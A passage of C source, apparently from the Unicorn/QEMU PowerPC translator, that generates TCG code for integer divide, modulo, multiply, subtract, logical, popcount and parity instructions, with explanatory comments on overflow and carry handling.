tcg_gen_movi_i64(tcg_ctx, t3, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_div_i64(tcg_ctx, ret, t0, t1); } else { tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_EQ, t2, t1, 0); tcg_gen_movi_i64(tcg_ctx, t3, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_divu_i64(tcg_ctx, ret, t0, t1); } if (compute_ov) { tcg_gen_mov_tl(tcg_ctx, cpu_ov, t2); if (is_isa300(ctx)) { tcg_gen_mov_tl(tcg_ctx, cpu_ov32, t2); } tcg_gen_or_tl(tcg_ctx, cpu_so, cpu_so, cpu_ov); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, ret); } } #define GEN_INT_ARITH_DIVD(name, opc3, sign, compute_ov) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ gen_op_arith_divd(ctx, cpu_gpr[rD(ctx->opcode)], \ cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], \ sign, compute_ov); \ } /* divdu divdu. divduo divduo. */ GEN_INT_ARITH_DIVD(divdu, 0x0E, 0, 0); GEN_INT_ARITH_DIVD(divduo, 0x1E, 0, 1); /* divd divd. divdo divdo. 
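   As in the 32-bit case above, gen_op_arith_divd folds overflow
   (INT64_MIN / -1) and division by zero into a single flag and then
   forces the divisor to 1 via movcond, conceptually:
       divisor = flag ? 1 : divisor;
       result  = dividend / divisor;
   so the TCG division op itself can never trap.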
*/ GEN_INT_ARITH_DIVD(divd, 0x0F, 1, 0); GEN_INT_ARITH_DIVD(divdo, 0x1F, 1, 1); GEN_DIVE(divdeu, divdeu, 0); GEN_DIVE(divdeuo, divdeu, 1); GEN_DIVE(divde, divde, 0); GEN_DIVE(divdeo, divde, 1); #endif static inline void gen_op_arith_modw(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, int sign) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, arg1); tcg_gen_trunc_tl_i32(tcg_ctx, t1, arg2); if (sign) { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, t2, t0, INT_MIN); tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, t3, t1, -1); tcg_gen_and_i32(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_i32(tcg_ctx, t2, t2, t3); tcg_gen_movi_i32(tcg_ctx, t3, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_rem_i32(tcg_ctx, t3, t0, t1); tcg_gen_ext_i32_tl(tcg_ctx, ret, t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } else { TCGv_i32 t2 = tcg_const_i32(tcg_ctx, 1); TCGv_i32 t3 = tcg_const_i32(tcg_ctx, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, t1, t1, t3, t2, t1); tcg_gen_remu_i32(tcg_ctx, t3, t0, t1); tcg_gen_extu_i32_tl(tcg_ctx, ret, t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } #define GEN_INT_ARITH_MODW(name, opc3, sign) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ gen_op_arith_modw(ctx, cpu_gpr[rD(ctx->opcode)], \ cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], \ sign); \ } GEN_INT_ARITH_MODW(moduw, 0x08, 0); GEN_INT_ARITH_MODW(modsw, 0x18, 1); #if defined(TARGET_PPC64) static inline void gen_op_arith_modd(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, int sign) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_mov_i64(tcg_ctx, t0, arg1); tcg_gen_mov_i64(tcg_ctx, t1, arg2); if (sign) { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_EQ, t2, t0, INT64_MIN); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_EQ, t3, t1, -1); tcg_gen_and_i64(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_i64(tcg_ctx, t2, t2, t3); tcg_gen_movi_i64(tcg_ctx, t3, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_rem_i64(tcg_ctx, ret, t0, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } else { TCGv_i64 t2 = tcg_const_i64(tcg_ctx, 1); TCGv_i64 t3 = tcg_const_i64(tcg_ctx, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t1, t1, t3, t2, t1); tcg_gen_remu_i64(tcg_ctx, ret, t0, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } #define GEN_INT_ARITH_MODD(name, opc3, sign) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ gen_op_arith_modd(ctx, cpu_gpr[rD(ctx->opcode)], \ cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], \ sign); \ } GEN_INT_ARITH_MODD(modud, 0x08, 0); GEN_INT_ARITH_MODD(modsd, 0x18, 1); #endif /* mulhw mulhw. 
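   Implemented with one widening multiply: muls2_i32 produces the
   64-bit signed product as a (lo, hi) register pair and only hi is
   kept. Illustrative example: 0x40000000 * 4 yields the pair
   (0x00000000, 0x00000001), so rD = 1.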
*/ static void gen_mulhw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); tcg_gen_muls2_i32(tcg_ctx, t0, t1, t0, t1); tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t1); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* mulhwu mulhwu. */ static void gen_mulhwu(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); tcg_gen_mulu2_i32(tcg_ctx, t0, t1, t0, t1); tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t1); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* mullw mullw. */ static void gen_mullw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #if defined(TARGET_PPC64) TCGv_i64 t0, t1; t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32s_tl(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); tcg_gen_ext32s_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); tcg_gen_mul_i64(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); #else tcg_gen_mul_i32(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); #endif if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* mullwo mullwo. */ static void gen_mullwo(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); tcg_gen_muls2_i32(tcg_ctx, t0, t1, t0, t1); #if defined(TARGET_PPC64) tcg_gen_concat_i32_i64(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0, t1); #else tcg_gen_mov_i32(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); #endif tcg_gen_sari_i32(tcg_ctx, t0, t0, 31); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_NE, t0, t0, t1); tcg_gen_extu_i32_tl(tcg_ctx, cpu_ov, t0); if (is_isa300(ctx)) { tcg_gen_mov_tl(tcg_ctx, cpu_ov32, cpu_ov); } tcg_gen_or_tl(tcg_ctx, cpu_so, cpu_so, cpu_ov); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* mulli */ static void gen_mulli(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_muli_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], SIMM(ctx->opcode)); } #if defined(TARGET_PPC64) /* mulhd mulhd. */ static void gen_mulhd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv lo = tcg_temp_new(tcg_ctx); tcg_gen_muls2_tl(tcg_ctx, lo, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); tcg_temp_free(tcg_ctx, lo); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* mulhdu mulhdu. 
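   Same single-multiply scheme as mulhw, widened to 64 x 64 -> 128:
   mulu2_tl returns the (lo, hi) halves of the unsigned product and
   the high half becomes rD.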
*/ static void gen_mulhdu(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv lo = tcg_temp_new(tcg_ctx); tcg_gen_mulu2_tl(tcg_ctx, lo, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); tcg_temp_free(tcg_ctx, lo); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* mulld mulld. */ static void gen_mulld(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_mul_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* mulldo mulldo. */ static void gen_mulldo(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_muls2_i64(tcg_ctx, t0, t1, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); tcg_gen_mov_i64(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); tcg_gen_sari_i64(tcg_ctx, t0, t0, 63); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_NE, cpu_ov, t0, t1); if (is_isa300(ctx)) { tcg_gen_mov_tl(tcg_ctx, cpu_ov32, cpu_ov); } tcg_gen_or_tl(tcg_ctx, cpu_so, cpu_so, cpu_ov); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } #endif /* Common subf function */ static inline void gen_op_arith_subf(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, bool add_ca, bool compute_ca, bool compute_ov, bool compute_rc0) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = ret; if (compute_ca || compute_ov) { t0 = tcg_temp_new(tcg_ctx); } if (compute_ca) { /* dest = ~arg1 + arg2 [+ ca]. */ if (NARROW_MODE(ctx)) { /* * Caution: a non-obvious corner case of the spec is that * we must produce the *entire* 64-bit addition, but * produce the carry into bit 32. */ TCGv inv1 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_not_tl(tcg_ctx, inv1, arg1); if (add_ca) { tcg_gen_add_tl(tcg_ctx, t0, arg2, cpu_ca); } else { tcg_gen_addi_tl(tcg_ctx, t0, arg2, 1); } tcg_gen_xor_tl(tcg_ctx, t1, arg2, inv1); /* add without carry */ tcg_gen_add_tl(tcg_ctx, t0, t0, inv1); tcg_temp_free(tcg_ctx, inv1); tcg_gen_xor_tl(tcg_ctx, cpu_ca, t0, t1); /* bits changed w/ carry */ tcg_temp_free(tcg_ctx, t1); tcg_gen_extract_tl(tcg_ctx, cpu_ca, cpu_ca, 32, 1); if (is_isa300(ctx)) { tcg_gen_mov_tl(tcg_ctx, cpu_ca32, cpu_ca); } } else if (add_ca) { TCGv zero, inv1 = tcg_temp_new(tcg_ctx); tcg_gen_not_tl(tcg_ctx, inv1, arg1); zero = tcg_const_tl(tcg_ctx, 0); tcg_gen_add2_tl(tcg_ctx, t0, cpu_ca, arg2, zero, cpu_ca, zero); tcg_gen_add2_tl(tcg_ctx, t0, cpu_ca, t0, cpu_ca, inv1, zero); gen_op_arith_compute_ca32(ctx, t0, inv1, arg2, cpu_ca32, 0); tcg_temp_free(tcg_ctx, zero); tcg_temp_free(tcg_ctx, inv1); } else { tcg_gen_setcond_tl(tcg_ctx, TCG_COND_GEU, cpu_ca, arg2, arg1); tcg_gen_sub_tl(tcg_ctx, t0, arg2, arg1); gen_op_arith_compute_ca32(ctx, t0, arg1, arg2, cpu_ca32, 1); } } else if (add_ca) { /* * Since we're ignoring carry-out, we can simplify the * standard ~arg1 + arg2 + ca to arg2 - arg1 + ca - 1.
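         *
         * Two's-complement derivation (illustrative): ~arg1 == -arg1 - 1,
         * hence
         *     ~arg1 + arg2 + ca == (-arg1 - 1) + arg2 + ca
         *                       == arg2 - arg1 + ca - 1,
         * which is exactly the sub/add/subi sequence emitted below.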
*/ tcg_gen_sub_tl(tcg_ctx, t0, arg2, arg1); tcg_gen_add_tl(tcg_ctx, t0, t0, cpu_ca); tcg_gen_subi_tl(tcg_ctx, t0, t0, 1); } else { tcg_gen_sub_tl(tcg_ctx, t0, arg2, arg1); } if (compute_ov) { gen_op_arith_compute_ov(ctx, t0, arg1, arg2, 1); } if (unlikely(compute_rc0)) { gen_set_Rc0(ctx, t0); } if (t0 != ret) { tcg_gen_mov_tl(tcg_ctx, ret, t0); tcg_temp_free(tcg_ctx, t0); } } /* Sub functions with two operands */ #define GEN_INT_ARITH_SUBF(name, opc3, add_ca, compute_ca, compute_ov) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ gen_op_arith_subf(ctx, cpu_gpr[rD(ctx->opcode)], \ cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], \ add_ca, compute_ca, compute_ov, Rc(ctx->opcode)); \ } /* Sub functions with one operand and one immediate */ #define GEN_INT_ARITH_SUBF_CONST(name, opc3, const_val, \ add_ca, compute_ca, compute_ov) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv t0 = tcg_const_tl(tcg_ctx, const_val); \ gen_op_arith_subf(ctx, cpu_gpr[rD(ctx->opcode)], \ cpu_gpr[rA(ctx->opcode)], t0, \ add_ca, compute_ca, compute_ov, Rc(ctx->opcode)); \ tcg_temp_free(tcg_ctx, t0); \ } /* subf subf. subfo subfo. */ GEN_INT_ARITH_SUBF(subf, 0x01, 0, 0, 0) GEN_INT_ARITH_SUBF(subfo, 0x11, 0, 0, 1) /* subfc subfc. subfco subfco. */ GEN_INT_ARITH_SUBF(subfc, 0x00, 0, 1, 0) GEN_INT_ARITH_SUBF(subfco, 0x10, 0, 1, 1) /* subfe subfe. subfeo subfeo. */ GEN_INT_ARITH_SUBF(subfe, 0x04, 1, 1, 0) GEN_INT_ARITH_SUBF(subfeo, 0x14, 1, 1, 1) /* subfme subfme. subfmeo subfmeo. */ GEN_INT_ARITH_SUBF_CONST(subfme, 0x07, -1LL, 1, 1, 0) GEN_INT_ARITH_SUBF_CONST(subfmeo, 0x17, -1LL, 1, 1, 1) /* subfze subfze. subfzeo subfzeo.*/ GEN_INT_ARITH_SUBF_CONST(subfze, 0x06, 0, 1, 1, 0) GEN_INT_ARITH_SUBF_CONST(subfzeo, 0x16, 0, 1, 1, 1) /* subfic */ static void gen_subfic(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv c = tcg_const_tl(tcg_ctx, SIMM(ctx->opcode)); gen_op_arith_subf(ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], c, 0, 1, 0, 0); tcg_temp_free(tcg_ctx, c); } /* neg neg. nego nego. */ static inline void gen_op_arith_neg(DisasContext *ctx, bool compute_ov) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv zero = tcg_const_tl(tcg_ctx, 0); gen_op_arith_subf(ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], zero, 0, 0, compute_ov, Rc(ctx->opcode)); tcg_temp_free(tcg_ctx, zero); } static void gen_neg(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_neg_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); if (unlikely(Rc(ctx->opcode))) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } static void gen_nego(DisasContext *ctx) { gen_op_arith_neg(ctx, 1); } /*** Integer logical ***/ #define GEN_LOGICAL2(name, tcg_op, opc, type) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ tcg_op(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], \ cpu_gpr[rB(ctx->opcode)]); \ if (unlikely(Rc(ctx->opcode) != 0)) \ gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); \ } #define GEN_LOGICAL1(name, tcg_op, opc, type) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ tcg_op(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); \ if (unlikely(Rc(ctx->opcode) != 0)) \ gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); \ } /* and & and. */ GEN_LOGICAL2(and, tcg_gen_and_tl, 0x00, PPC_INTEGER); /* andc & andc. */ GEN_LOGICAL2(andc, tcg_gen_andc_tl, 0x01, PPC_INTEGER); /* andi.
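   andi. exists only in its CR0-recording form, so gen_andi_ below
   calls gen_set_Rc0 unconditionally rather than testing Rc(opcode).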
*/ static void gen_andi_(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_andi_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], UIMM(ctx->opcode)); gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } /* andis. */ static void gen_andis_(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_andi_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], UIMM(ctx->opcode) << 16); gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } /* cntlzw */ static void gen_cntlzw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t, cpu_gpr[rS(ctx->opcode)]); tcg_gen_clzi_i32(tcg_ctx, t, t, 32); tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t); tcg_temp_free_i32(tcg_ctx, t); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* cnttzw */ static void gen_cnttzw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t, cpu_gpr[rS(ctx->opcode)]); tcg_gen_ctzi_i32(tcg_ctx, t, t, 32); tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t); tcg_temp_free_i32(tcg_ctx, t); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* eqv & eqv. */ GEN_LOGICAL2(eqv, tcg_gen_eqv_tl, 0x08, PPC_INTEGER); /* extsb & extsb. */ GEN_LOGICAL1(extsb, tcg_gen_ext8s_tl, 0x1D, PPC_INTEGER); /* extsh & extsh. */ GEN_LOGICAL1(extsh, tcg_gen_ext16s_tl, 0x1C, PPC_INTEGER); /* nand & nand. */ GEN_LOGICAL2(nand, tcg_gen_nand_tl, 0x0E, PPC_INTEGER); /* nor & nor. */ GEN_LOGICAL2(nor, tcg_gen_nor_tl, 0x03, PPC_INTEGER); #if defined(TARGET_PPC64) static void gen_pause(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, 0); #ifdef _MSC_VER tcg_gen_st_i32(tcg_ctx, t0, tcg_ctx->cpu_env, 0 - offsetof(PowerPCCPU, env) + offsetof(CPUState, halted)); #else tcg_gen_st_i32(tcg_ctx, t0, tcg_ctx->cpu_env, -offsetof(PowerPCCPU, env) + offsetof(CPUState, halted)); #endif tcg_temp_free_i32(tcg_ctx, t0); /* Stop translation, this gives other CPUs a chance to run */ gen_exception_nip(ctx, EXCP_HLT, ctx->base.pc_next); } #endif /* defined(TARGET_PPC64) */ /* or & or. */ static void gen_or(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rs, ra, rb; rs = rS(ctx->opcode); ra = rA(ctx->opcode); rb = rB(ctx->opcode); /* Optimisation for mr. 
ri case */ if (rs != ra || rs != rb) { if (rs != rb) { tcg_gen_or_tl(tcg_ctx, cpu_gpr[ra], cpu_gpr[rs], cpu_gpr[rb]); } else { tcg_gen_mov_tl(tcg_ctx, cpu_gpr[ra], cpu_gpr[rs]); } if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[ra]); } } else if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rs]); #if defined(TARGET_PPC64) } else if (rs != 0) { /* 0 is nop */ int prio = 0; switch (rs) { case 1: /* Set process priority to low */ prio = 2; break; case 6: /* Set process priority to medium-low */ prio = 3; break; case 2: /* Set process priority to normal */ prio = 4; break; case 31: if (!ctx->pr) { /* Set process priority to very low */ prio = 1; } break; case 5: if (!ctx->pr) { /* Set process priority to medium-high */ prio = 5; } break; case 3: if (!ctx->pr) { /* Set process priority to high */ prio = 6; } break; case 7: if (ctx->hv && !ctx->pr) { /* Set process priority to very high */ prio = 7; } break; default: break; } if (prio) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_spr(tcg_ctx, t0, SPR_PPR); tcg_gen_andi_tl(tcg_ctx, t0, t0, ~0x001C000000000000ULL); tcg_gen_ori_tl(tcg_ctx, t0, t0, ((uint64_t)prio) << 50); gen_store_spr(tcg_ctx, SPR_PPR, t0); tcg_temp_free(tcg_ctx, t0); } /* * Pause out of TCG otherwise spin loops with smt_low eat too * much CPU and the kernel hangs. This applies to all * encodings other than no-op, e.g., miso(rs=26), yield(27), * mdoio(29), mdoom(30), and all currently undefined. */ gen_pause(ctx); #endif } } /* orc & orc. */ GEN_LOGICAL2(orc, tcg_gen_orc_tl, 0x0C, PPC_INTEGER); /* xor & xor. */ static void gen_xor(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* Optimisation for "set to zero" case */ if (rS(ctx->opcode) != rB(ctx->opcode)) { tcg_gen_xor_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); } else { tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], 0); } if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* ori */ static void gen_ori(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong uimm = UIMM(ctx->opcode); if (rS(ctx->opcode) == rA(ctx->opcode) && uimm == 0) { return; } tcg_gen_ori_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], uimm); } /* oris */ static void gen_oris(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong uimm = UIMM(ctx->opcode); if (rS(ctx->opcode) == rA(ctx->opcode) && uimm == 0) { /* NOP */ return; } tcg_gen_ori_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], uimm << 16); } /* xori */ static void gen_xori(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong uimm = UIMM(ctx->opcode); if (rS(ctx->opcode) == rA(ctx->opcode) && uimm == 0) { /* NOP */ return; } tcg_gen_xori_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], uimm); } /* xoris */ static void gen_xoris(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong uimm = UIMM(ctx->opcode); if (rS(ctx->opcode) == rA(ctx->opcode) && uimm == 0) { /* NOP */ return; } tcg_gen_xori_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], uimm << 16); } /* popcntb : PowerPC 2.03 specification */ static void gen_popcntb(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_popcntb(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); } static void gen_popcntw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #if defined(TARGET_PPC64) gen_helper_popcntw(tcg_ctx, cpu_gpr[rA(ctx->opcode)],
cpu_gpr[rS(ctx->opcode)]); #else tcg_gen_ctpop_i32(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); #endif } #if defined(TARGET_PPC64) /* popcntd: PowerPC 2.06 specification */ static void gen_popcntd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_ctpop_i64(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); } #endif /* prtyw: PowerPC 2.05 specification */ static void gen_prtyw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv ra = cpu_gpr[rA(ctx->opcode)]; TCGv rs = cpu_gpr[rS(ctx->opcode)]; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, t0, rs, 16); tcg_gen_xor_tl(tcg_ctx, ra, rs, t0); tcg_gen_shri_tl(tcg_ctx, t0, ra, 8); tcg_gen_xor_tl(tcg_ctx, ra, ra, t0); tcg_gen_andi_tl(tcg_ctx, ra, ra, (target_ulong)0x100000001ULL); tcg_temp_free(tcg_ctx, t0); } #if defined(TARGET_PPC64) /* prtyd: PowerPC 2.05 specification */ static void gen_prtyd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv ra = cpu_gpr[rA(ctx->opcode)]; 